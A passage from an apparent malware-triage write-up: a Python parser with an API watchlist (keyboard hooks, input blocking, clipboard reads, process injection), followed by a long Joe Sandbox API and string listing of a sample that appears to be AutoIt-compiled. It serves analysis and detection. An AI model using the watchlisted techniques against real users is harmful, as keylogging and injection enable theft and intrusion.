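            "modules": sorted({c.module for c in calls}),
            "strings": sorted({s for c in calls for s in c.strings}),
            "subcalls": sorted({c.subcall_of for c in calls if c.subcall_of is not None})}


# APIs worth a second look, chosen here for illustration to mirror behaviours the
# report's signature section names (keyboard hook, input blocking, clipboard reads,
# injection); this is not a Joe Sandbox list.
WATCHLIST = frozenset({"SetWindowsHookExW", "SetWindowsHookExA", "GetAsyncKeyState",
                       "BlockInput", "GetClipboardData", "WriteProcessMemory",
                       "CreateRemoteThread"})


def flag(calls: List[ApiCall], watch=WATCHLIST) -> List[ApiCall]:
    """Calls whose API is on the watchlist, in listing order.  A hit is a triage
    hint, not a verdict: in SAMPLE, GetAsyncKeyState is polled with 0x01 and 0x02
    (VK_LBUTTON / VK_RBUTTON) by AutoIt's own GUI code."""
    return [c for c in calls if c.api in watch]


# Sample input copied from the "AutoIt v3 GUI" function block in the listing above,
# headers included, so the parser is exercised on real report lines.
SAMPLE = r"""
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528BC
• GetSystemMetrics.USER32(00000007), ref: 00B528C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528EF
• GetSystemMetrics.USER32(00000008), ref: 00B528F7
• GetSystemMetrics.USER32(00000004), ref: 00B5291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B52939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B52949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B5297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B52990
• GetClientRect.USER32(00000000,000000FF), ref: 00B529AE
• GetStockObject.GDI32(00000011), ref: 00B529CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00B529D5
  • Part of subcall function 00B52344: GetCursorPos.USER32(?), ref: 00B52357
  • Part of subcall function 00B52344: ScreenToClient.USER32(00C157B0,?), ref: 00B52374
  • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000001), ref: 00B52399
  • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000002), ref: 00B523A7
• SetTimer.USER32(00000000,00000000,00000028,00B51256), ref: 00B529FC
Strings
• String ID: AutoIt v3 GUI
"""

# Three further forms copied from other blocks above: no parentheses, a short
# argument list, and a device-path string argument.
SAMPLE_MISC = r"""
• _memset.LIBCMT ref: 00BD8C44
• SendMessageW.USER32(?,00000412,00000000), ref: 00BD4C32
• GetDriveTypeW.KERNEL32(?,00BDFAC0,?,\\.\,00BDF910), ref: 00BBADFB
"""
```

Run `summarize(parse_api_lines(block))` over each "APIs" section of a saved report to get the same API set the "API ID" line compresses, plus the literal strings to pivot on (here "AutoIt v3 GUI"), and `flag()` to pull out the handful of functions that touch watchlisted APIs; the `site` and `subcall_of` addresses then take you straight to the right place in the memory dump named under "Memory Dump Source".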
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 2258151342-1459072770
                                              • Opcode ID: c9f2be280c561059120efa154a243dafc4d921b2c019b7c1ba66324e18935bc3
                                              • Instruction ID: 6322ca4e3f171953acfa8d369556025a98217f41446df7c95b11459bbcb71599
                                              • Opcode Fuzzy Hash: c9f2be280c561059120efa154a243dafc4d921b2c019b7c1ba66324e18935bc3
                                              • Instruction Fuzzy Hash: C741E531A042057BDB10AB748C47EFF77FCEF45710F0480EAF919A6192EF759A0196A5
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BAA47A
                                              • __swprintf.LIBCMT ref: 00BAA51B
                                              • _wcscmp.LIBCMT ref: 00BAA52E
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BAA583
                                              • _wcscmp.LIBCMT ref: 00BAA5BF
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00BAA5F6
                                              • GetDlgCtrlID.USER32(?), ref: 00BAA648
                                              • GetWindowRect.USER32(?,?), ref: 00BAA67E
                                              • GetParent.USER32(?), ref: 00BAA69C
                                              • ScreenToClient.USER32(00000000), ref: 00BAA6A3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BAA71D
                                              • _wcscmp.LIBCMT ref: 00BAA731
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00BAA757
                                              • _wcscmp.LIBCMT ref: 00BAA76B
                                                • Part of subcall function 00B7362C: _iswctype.LIBCMT ref: 00B73634
                                              Strings
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00BAAF18
                                              • _wcscmp.LIBCMT ref: 00BAAF29
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BAAF51
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00BAAF6E
                                              • _wcscmp.LIBCMT ref: 00BAAF8C
                                              • _wcsstr.LIBCMT ref: 00BAAF9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAAFD5
                                              • _wcscmp.LIBCMT ref: 00BAAFE5
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BAB00C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAB055
                                              • _wcscmp.LIBCMT ref: 00BAB065
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00BAB08D
                                              • GetWindowRect.USER32(00000004,?), ref: 00BAB0F6
                                              Strings
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC5013
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BC501E
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00BC5029
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00BC5034
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00BC503F
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00BC504A
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00BC5055
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00BC5060
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00BC506B
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00BC5076
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00BC5081
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00BC508C
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00BC5097
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00BC50A2
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00BC50AD
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00BC50B8
                                              • GetCursorInfo.USER32(?), ref: 00BC50C8
                                              Similarity
                                              • API ID: Cursor$Load$Info
                                              • String ID:
                                              APIs
                                              • _memset.LIBCMT ref: 00BDA259
                                              • DestroyWindow.USER32(?,?), ref: 00BDA2D3
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BDA34D
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BDA36F
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA382
                                              • DestroyWindow.USER32(00000000), ref: 00BDA3A4
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B50000,00000000), ref: 00BDA3DB
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA3F4
                                              • GetDesktopWindow.USER32 ref: 00BDA40D
                                              • GetWindowRect.USER32(00000000), ref: 00BDA414
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BDA42C
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BDA444
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              Strings
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BD4424
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD446F
                                              Strings
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BDB8B4
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD91C2), ref: 00BDB910
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB949
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BDB98C
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB9C3
                                              • FreeLibrary.KERNEL32(?), ref: 00BDB9CF
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDB9DF
                                              • DestroyCursor.USER32(?), ref: 00BDB9EE
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BDBA0B
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BDBA17
                                                • Part of subcall function 00B72EFD: __wcsicmp_l.LIBCMT ref: 00B72F86
                                              Strings
                                              Similarity
                                              • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CharLowerBuffW.USER32(?,?), ref: 00BBA3CB
                                              • GetDriveTypeW.KERNEL32 ref: 00BBA418
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA460
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA497
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA4C5
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Strings
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00BAF8DF
                                              • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF8E8
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • GetModuleHandleW.KERNEL32(00000000,00C15310,?,00000FFF,?,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00BAF90A
                                              • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF90D
                                              • __swprintf.LIBCMT ref: 00BAF95D
                                              • __swprintf.LIBCMT ref: 00BAF96E
                                              • _wprintf.LIBCMT ref: 00BAFA17
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAFA2E
                                              Strings
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: 0aee8aa983fe2a629f4b537555549b7239fb1a68b0d3f5dfbaba6f63c79c3545
                                              • Instruction ID: f327d0e2149f940294675f37ced9e3ad1fd5ac28b1bceea016ff6445651bc14f
                                              • Opcode Fuzzy Hash: 0aee8aa983fe2a629f4b537555549b7239fb1a68b0d3f5dfbaba6f63c79c3545
                                              • Instruction Fuzzy Hash: BB413D72944209AACB15EBE0DD96EFEB7B8EF19301F1040E5B905760A2EE355F0DCA61
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD9207,?,?), ref: 00BDBA56
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA6D
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA78
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA85
                                              • GlobalLock.KERNEL32(00000000), ref: 00BDBA8E
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA9D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00BDBAA6
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBAAD
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BDBABE
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE2CAC,?), ref: 00BDBAD7
                                              • GlobalFree.KERNEL32(00000000), ref: 00BDBAE7
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BDBB0B
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BDBB36
                                              • DeleteObject.GDI32(00000000), ref: 00BDBB5E
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BDBB74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                              • Instruction ID: c95c6f259702a9c0d6a156a3dc81a32e1da601c4369a7723254f8e9b69e49a66
                                              • Opcode Fuzzy Hash: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                              • Instruction Fuzzy Hash: 65412975601205EFDB119F65DC98EBABBF9EF89711F1140AAF906D7260EB309A01CB60
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 00BBDA10
                                              • _wcscat.LIBCMT ref: 00BBDA28
                                              • _wcscat.LIBCMT ref: 00BBDA3A
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDA4F
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDA63
                                              • GetFileAttributesW.KERNEL32(?), ref: 00BBDA7B
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BBDA95
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: d3e6562ae35c0095c1a25761320a0b6c172f740d9e905eec6a38102301fac872
                                              • Instruction ID: cf91af45a1a93d5a68b0d444675c385baacad6c09f35e5315669da57870180a6
                                              • Opcode Fuzzy Hash: d3e6562ae35c0095c1a25761320a0b6c172f740d9e905eec6a38102301fac872
                                              • Instruction Fuzzy Hash: CA8191716042419FCB24DF64C884ABAB7E4EF89350F1888AEF8C9C7251F7B8D945CB52
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BC738F
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BC739B
                                              • CreateCompatibleDC.GDI32(?), ref: 00BC73A7
                                              • SelectObject.GDI32(00000000,?), ref: 00BC73B4
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BC7408
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC7444
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BC7468
                                              • SelectObject.GDI32(00000006,?), ref: 00BC7470
                                              • DeleteObject.GDI32(?), ref: 00BC7479
                                              • DeleteDC.GDI32(00000006), ref: 00BC7480
                                              • ReleaseDC.USER32(00000000,?), ref: 00BC748B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 9b6a6a186eb699cce09e5183bc817abcc938fd8b2b7404d3d6cea50b86238e6f
                                              • Instruction ID: 46845caf4d0fa697a80cafa5e186053ac74eaa7de45898e7778f28715931d982
                                              • Opcode Fuzzy Hash: 9b6a6a186eb699cce09e5183bc817abcc938fd8b2b7404d3d6cea50b86238e6f
                                              • Instruction Fuzzy Hash: BF513875904209EFCB14CFA8CC85EAEBBF9EF88310F14846EF95A97210DB31A941CB50
                                              APIs
                                                • Part of subcall function 00B70957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B56B0C,?,00008000), ref: 00B70973
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B56CFA
                                                • Part of subcall function 00B5586D: _wcscpy.LIBCMT ref: 00B558A5
                                                • Part of subcall function 00B7363D: _iswctype.LIBCMT ref: 00B73645
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: c029238e0cd11a7596859cf4daf24396cebab44d74809c335dce9de8994d25d2
                                              • Instruction ID: 48f2924056980deb8df32274284c739893681a648450438c65d1ecccc2c1434a
                                              • Opcode Fuzzy Hash: c029238e0cd11a7596859cf4daf24396cebab44d74809c335dce9de8994d25d2
                                              • Instruction Fuzzy Hash: A002BC301083419FC724EF24C891AAFBBF5EF99315F5048ADF89A972A1DB30D949CB52
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2D50
                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BB2DDD
                                              • GetMenuItemCount.USER32(00C15890), ref: 00BB2E66
                                              • DeleteMenu.USER32(00C15890,00000005,00000000,000000F5,?,?), ref: 00BB2EF6
                                              • DeleteMenu.USER32(00C15890,00000004,00000000), ref: 00BB2EFE
                                              • DeleteMenu.USER32(00C15890,00000006,00000000), ref: 00BB2F06
                                              • DeleteMenu.USER32(00C15890,00000003,00000000), ref: 00BB2F0E
                                              • GetMenuItemCount.USER32(00C15890), ref: 00BB2F16
                                              • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB2F4C
                                              • GetCursorPos.USER32(?), ref: 00BB2F56
                                              • SetForegroundWindow.USER32(00000000), ref: 00BB2F5F
                                              • TrackPopupMenuEx.USER32(00C15890,00000000,?,00000000,00000000,00000000), ref: 00BB2F72
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BB2F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 3993528054-0
                                              • Opcode ID: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                              • Instruction ID: f7cee4a5ac52c16bafa013b61ead7d4ba39a09e9ab43f47a0d457dbb64ce4044
                                              • Opcode Fuzzy Hash: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                              • Instruction Fuzzy Hash: 1A71B270605206BFEB218F55DC85FFABFA4FB04764F1442A6F615AA1E1C7F19820DB90
                                              APIs
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • _memset.LIBCMT ref: 00BA786B
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA78A0
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA78BC
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA78D8
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA7902
                                              • CLSIDFromString.COMBASE(?,?), ref: 00BA792A
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA7935
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA793A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: 916b17238d59ba13935f5bb8eed23e7481f5042c69887a45105ea26357d76778
                                              • Instruction ID: b3352783009413ffa112c7dfdfb65df3c599a1f6bcb94519007a0d58febbcccf
                                              • Opcode Fuzzy Hash: 916b17238d59ba13935f5bb8eed23e7481f5042c69887a45105ea26357d76778
                                              • Instruction Fuzzy Hash: 1B410A72D58229ABCF11EF94EC55EEEB7B8FF04351F0441AAE905A31A1EE345D09CB90
                                              APIs
